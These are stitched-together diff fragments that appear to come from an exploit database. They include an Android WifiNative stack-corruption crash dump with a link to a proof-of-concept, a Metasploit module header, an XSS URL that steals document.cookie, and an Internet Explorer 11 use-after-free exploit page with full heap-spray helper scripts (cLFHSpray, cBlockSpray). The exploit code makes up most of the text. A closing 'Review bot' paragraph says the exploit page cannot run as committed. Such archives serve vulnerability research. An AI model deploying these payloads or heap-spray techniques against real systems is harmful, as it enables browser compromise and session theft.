params.ap[i].high = helper.getIntField(objAp, "high");
}
See attached for a POC which causes a crash before the function with the corrupted stack frame returns and checks the stack cookie.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[---------------------------------------------------------------------REGISTERS----------------------------------------------------------------------]
*X0 0x80000000 <-- 0x0
*X1 0x0
*X2 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
*X3 0x3
*X4 0x709bf05fc0 <-- stp x28, x27, [sp, #-0x60]!
*X5 0x709c1f07b0 (art::gJniNativeInterface) <-- 0x0
*X6 0x709bf27034 <-- cbz x2, #0x709bf27040 /* u'b' */
*X7 0x284801ff284800ff
*X8 0xc01d0142c01d0229
*X9 0x1
*X10 0xc01d0142c01d0141
*X11 0x7082dff4e8 <-- 0x41013fb31dc0
X12 0x0
*X13 0x0
*X14 0x0
*X15 0x33511e057221be
*X16 0x709f0035a0 (pthread_getspecific@got.plt) --> 0x709efaad5c (pthread_getspecific) <-- movz w8, #0x8000, lsl #16
*X17 0x709efaad5c (pthread_getspecific) <-- movz w8, #0x8000, lsl #16
*X18 0x0
*X19 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
*X20 0x7082dfe0a0 --> 0x70833c1470 --> 0x7083381c0c (android::JNIObject<_jobject*>::~JNIObject()) <-- adrp x2, #0x70833c2000
*X21 0x7082dfe0b8 --> 0x70833c1490 --> 0x7083381c70 (android::JNIObject<_jstring*>::~JNIObject()) <-- adrp x2, #0x70833c2000
*X22 0x7082dfe078 <-- 0x0
*X23 0xb1da807287fa8cf
*X24 0x709f00e86c (je_tsd_tsd) <-- 0xa880000000
*X25 0x7082dfe8d8 <-- u'c0:1d:b3:3f:1:4...'
*X26 0x200011
*X27 0x7082dfe0d0 <-- 0x100000000001
*X28 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
*SP 0x70815310f0 <-- 0x0
*PC 0x709efaada8 (pthread_getspecific+76) <-- ldr x10, [x10, #0xe0]
[------------------------------------------------------------------------CODE------------------------------------------------------------------------]
=> 0x709efaada8L <pthread_getspecific+76> ldr x10, [x10, #0xe0]
0x709efaadacL <pthread_getspecific+80> cmp x10, x9
0x709efaadb0L <pthread_getspecific+84> b.ne #pthread_getspecific+56 <0x709efaad94>
...
0x709efaad94L <pthread_getspecific+56> mov x0, xzr
0x709efaad98L <pthread_getspecific+60> str xzr, [x8]
0x709efaad9cL <pthread_getspecific+64> ret
0x709efaada0L <pthread_getspecific+68> add x10, x10, x8, lsl #4
0x709efaada4L <pthread_getspecific+72> add x8, x10, #0xe8
=> 0x709efaada8L <pthread_getspecific+76> ldr x10, [x10, #0xe0]
0x709efaadacL <pthread_getspecific+80> cmp x10, x9
0x709efaadb0L <pthread_getspecific+84> b.ne #pthread_getspecific+56 <0x709efaad94>
[------------------------------------------------------------------------CODE------------------------------------------------------------------------]
155 in bionic/libc/bionic/pthread_key.cpp
[-----------------------------------------------------------------------STACK------------------------------------------------------------------------]
00:0000| sp 0x70815310f0 <-- 0x0
...
04:0020| 0x7081531110 --> 0x3f800000 <-- 0x0
05:0028| 0x7081531118 <-- 0x0
...
[---------------------------------------------------------------------BACKTRACE----------------------------------------------------------------------]
> f 0 709efaada8 pthread_getspecific+76
f 1 709efd2394 je_free+68
f 2 709efd2394 je_free+68
f 3 709efd2394 je_free+68
f 4 709efd2394 je_free+68
f 5 7083387d10
f 6 7083387d10
f 7 7083387d10
Program received signal SIGSEGV (fault address 0x1d0142c01d0221)
pwndbg> bt
#0 pthread_getspecific (key=<optimized out>) at bionic/libc/bionic/pthread_key.cpp:160
#1 0x000000709efd2394 in je_tsd_wrapper_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#2 je_tsd_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#3 je_tsd_fetch () at external/jemalloc/include/jemalloc/internal/tsd.h:614
#4 je_free (ptr=0x707882c3e0) at external/jemalloc/src/jemalloc.c:1932
#5 0x0000007083387d10 in _JNIEnv::ReleaseStringUTFChars (utf=0x707882c3e0 "c0:1d:b3:3f:01:"..., string=0x200011, this=0x7091fd2b00) at libnativehelper/include/nativehelper/jni.h:851
#6 ScopedUtfChars::~ScopedUtfChars (this=<synthetic pointer>, __in_chrg=<optimized out>) at libnativehelper/include/nativehelper/ScopedUtfChars.h:45
#7 android::android_net_wifi_setHotlist (env=0x7091fd2b00, cls=<optimized out>, iface=<optimized out>, id=0x690a3633, ap=<optimized out>) at frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp:799
#8 0x000000709b1a084c in ?? ()
Fixed in https://source.android.com/security/bulletin/2016-12-01.html
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip


@ -15,12 +15,12 @@ By sending certain TR-064 commands, we can instruct the modem to open port 80 on
Proof of Concept Proof of Concept
================ ================
=end
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
=end
require 'msf/core' require 'msf/core'


@ -21,7 +21,7 @@ action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/
<label for="subject">Subject:</label><input id="subject" name="subject" <label for="subject">Subject:</label><input id="subject" name="subject"
type="text" /><br /> type="text" /><br />
<label for="message">Message:</label><textarea id="message" <label for="message">Message:</label><textarea id="message"
name="message">&lt;/textarea&gt;<br /> name="message"></textarea><br />
<input type="submit" value="Send"/> <input type="submit" value="Send"/>
</form> </form>


@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi
Version 1.1.0 is vulnerable; other versions may also be affected. Version 1.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=&lt;/textarea&gt;<script>alert(document.cookie);</script> http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>

188
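--- a/platforms/windows/dos/40946.html
+++ b/platforms/windows/dos/40946.html
@@ -0,0 +1,188 @@
+<!--
+Source: http://blog.skylined.nl/20161220001.html
+Synopsis
+A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 11. There is sufficient time between the free and reuse for an attacker to control the contents of the freed memory and exploit the vulnerability.
+Known affected software, attack vectors and potential mitigations
+Microsoft Internet Explorer 11
+An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
+Details
+This was one of the first bugs where I attempted to do a proper analysis, and I got some feedback from ZDI that explained what I got right and what I got wrong. Basically, on x86, a 0x28 byte memory block is allocated in MSHTML!CMarkup::Do­Embed­Pointers and when you execute document.exec­Command("Delete"). This memory can be freed when you execute document.open() in a DOMNode­Removed event handler. After that, you can use Javascript to reallocate the memory before it is reused.
+Repro.html:
+<!doctype html>
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=11">
+<script type="text/javascript">
+document.add­Event­Listener("DOMNode­Removed", function () {
+document.open(); // free
+// attempt to modify freed memory here
+// because it will be reused after this function returns.
+}, true);
+window.onload = function () {
+document.design­Mode="on";
+document.exec­Command("Select­All");
+document.exec­Command("Delete"); // allocate
+};
+</script>
+</head>
+<body>
+</body>
+</html>
+Exploit
+After getting the feedback from ZDI that helped me understand the root cause, I attempted to write an exploit that the issue could be controlled and may be exploitable. I did not keep track of whether my attempts where successful, so the below code may not actually function. However, it should give you an idea on how one might go about writing an exploit for this vulnerability.
+Sploit.html:
+-->
+<!doctype html>
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=11">
+<script src="c­LFHSpray.js"></script>
+<script src="c­Block­Spray.js"></script>
+<script>
+var aau­Copies­And­Sizes = [
+[0x08, 0x80],
+[0x08, 0x40],
+[0x08, 0x20],
+[0x10, 0x80]
+];
+var u­Base­Address = 0x12340000;
+var ao­Block­Sprays = new Array(aau­Copies­And­Sizes.length);
+for (var i = 0; i < aau­Copies­And­Sizes.length; i++) {
+ao­Block­Sprays[i] = new c­Block­Spray(aau­Copies­And­Sizes[i][0], aau­Copies­And­Sizes[i][1]);
+ao­Block­Sprays[i].set­Chunk­DWord(0x0100, u­Base­Address + 0x0300);
+ao­Block­Sprays[i].spray();
+}
+document.add­Event­Listener("DOMNode­Removed", function () {
+document.open();
+var o­LFHReuse = new c­LFHSpray(10, 0x28);
+o­LFHReuse.set­DWord(0x10, u­Base­Address + 0x0100);
+o­LFHReuse.set­DWord(0x14, u­Base­Address + 0x0200);
+o­LFHReuse.spray();
+}, true);
+window.onload = function () {
+document.design­Mode="on";
+document.exec­Command("Select­All");
+document.exec­Command("Delete");
+document.design­Mode="off";
+};
+</script>
+</head>
+<body>
+</body>
+</html>
+<!--
+########################################################################
+c­LFHSpray.js:
+function c­LFHSpray(u­Count, u­Size) {
+this.ao­Elements = new Array(u­Count);
+var au­Spray­Chars = new Array(u­Size - 1 >> 1);
+for (var i = 0; i < au­Spray­Chars.length; i++) {
+au­Spray­Chars[i] = ((i & 0x­FF) * 0x202 + 0x100) & 0x­FFFF;
+}
+this.set­DWord = function(u­Offset, u­Value) {
+this.set­Word(u­Offset, u­Value & 0x­FFFF);
+this.set­Word(u­Offset + 2, u­Value >>> 16);
+}
+this.set­Word = function(u­Offset, u­Value) {
+this.set­Byte(u­Offset, u­Value & 0x­FF);
+this.set­Byte(u­Offset + 1, u­Value >>> 8);
+}
+this.set­Byte = function(u­Offset, u­Value) {
+var u­Char­Offset = u­Offset >> 1;
+var u­Byte0 = (u­Offset & 1 ? au­Spray­Chars[u­Char­Offset] : u­Value) & 0x­FF;
+var u­Byte1 = (u­Offset & 1 ? u­Value : (au­Spray­Chars[u­Char­Offset] >> 8)) & 0x­FF;
+au­Spray­Chars[u­Char­Offset] = u­Byte0 + (u­Byte1 << 8);
+}
+this.spray = function() {
+var s­Spray­Buffer = String.from­Char­Code.apply(0, au­Spray­Chars);
+for (var i = 0; i < u­Count; i++) {
+this.ao­Elements[i] = document.create­Element("span"); // allocate 0x34 bytes
+this.ao­Elements[i].class­Name = s­Spray­Buffer; // allocate 0x10, u­Size and 0x40 bytes.
+}
+}
+}
+########################################################################
+c­Block­Spray.js:
+var c­Block­Spray = (function() {
+var u­Chunk­Size = 0x10000;
+var u­Block­Header­Size = 0x10;
+var u­Block­Footer­Size = 0x04;
+var as­Chunk­Template = new Array(u­Chunk­Size / 2);
+for (var u­Index = 0; u­Index < as­Chunk­Template.length; u­Index += 2) {
+as­Chunk­Template[u­Index] = String.from­Char­Code(u­Index);
+as­Chunk­Template[u­Index + 1] = String.from­Char­Code(0x­DEAD);
+}
+return function c­Block­Spray(u­Block­Count, u­Chunk­Count) {
+this.u­Block­Size = u­Chunk­Count * u­Chunk­Size - u­Block­Header­Size - u­Block­Footer­Size;
+var s­Chunk = as­Chunk­Template.join("");
+var s­Block, as­Blocks = new Array(u­Block­Count);
+this.set­Chunk­DWord = function (u­Offset, u­Value) {
+this.set­Chunk­Word(u­Offset, u­Value & 0x­FFFF);
+this.set­Chunk­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
+}
+this.set­Chunk­Word = function (u­Offset, u­Value) {
+if (s­Block) throw new Error("Cannot set chunk values after generating block");
+if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
+if (u­Offset >= u­Chunk­Size) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + u­Chunk­Size.to­String(16));
+var u­Index = u­Offset / 2;
+var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
+s­Chunk = s­Chunk.substr(0, u­Index) + s­Value + s­Chunk.substr(u­Index + 1);
+}
+this.generate­Block = function () {
+if (s­Block) throw new Error("Cannot generating block twice");
+s­Block = (
+s­Chunk.substr(u­Block­Header­Size / 2) +
+new Array(u­Chunk­Count - 1).join(s­Chunk) +
+s­Chunk.substr(0, (u­Chunk­Size - u­Block­Footer­Size) / 2)
+);
+}
+this.set­Block­DWord = function (u­Offset, u­Value) {
+this.set­Block­Word(u­Offset, u­Value & 0x­FFFF);
+this.set­Block­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
+}
+this.set­Block­Word = function (u­Offset, u­Value) {
+if (!s­Block) this.generate­Block();
+if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
+var u­Index = (u­Offset - u­Block­Header­Size) / 2;
+if (u­Index < 0) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be larger than 0x" + u­Block­Header­Size.to­String(16));
+if (u­Index >= s­Block.length) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + (u­Block­Header­Size + s­Block.length * 2).to­String(16));
+var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
+s­Block = s­Block.substr(0, u­Index) + s­Value + s­Block.substr(u­Index + 1);
+}
+this.spray = function() {
+if (!s­Block) this.generate­Block();
+for (var i = 0; i < u­Block­Count; i++) {
+as­Blocks[i] = ("" + s­Block).slice(0);
+}
+}
+}
+})();
+Time-line
+30 December 2013: This vulnerability was submitted to ZDI.
+8 January 2014: This vulnerability was acquired by ZDI.
+14 January 2014: This vulnerability was disclosed to Microsoft by ZDI.
+10 June 2014: This vulnerability was address by Microsoft in MS14-035.
+20 December 2016: Details of this vulnerability are released.
+-->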
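Review bot: The live part of this file (the Sploit.html section between the two HTML comments) cannot execute as committed: `<script src="c­LFHSpray.js">` and `<script src="c­Block­Spray.js">` reference helper scripts that this commit does not add as separate files — their source only appears inside the trailing comment — so the top-level `new c­Block­Spray(...)` call fails on an undefined name before the DOMNodeRemoved listener is ever registered, and only the commented-out Repro.html block documents the actual crash trigger. The identifiers throughout also appear to carry U+00AD soft hyphens (e.g. `document.add­Event­Listener`), which would be a syntax error in any JavaScript engine if they are present in the committed bytes rather than an artifact of this rendering; worth checking the raw file. Anyone using this entry to confirm that MS14-035 is applied on a host would benefit from a one-line note at the top of the file, such as `<!-- NOTE: the Sploit.html section below is non-functional as shipped (see the author's own caveat); the runnable trigger is Repro.html in the comment above. -->`.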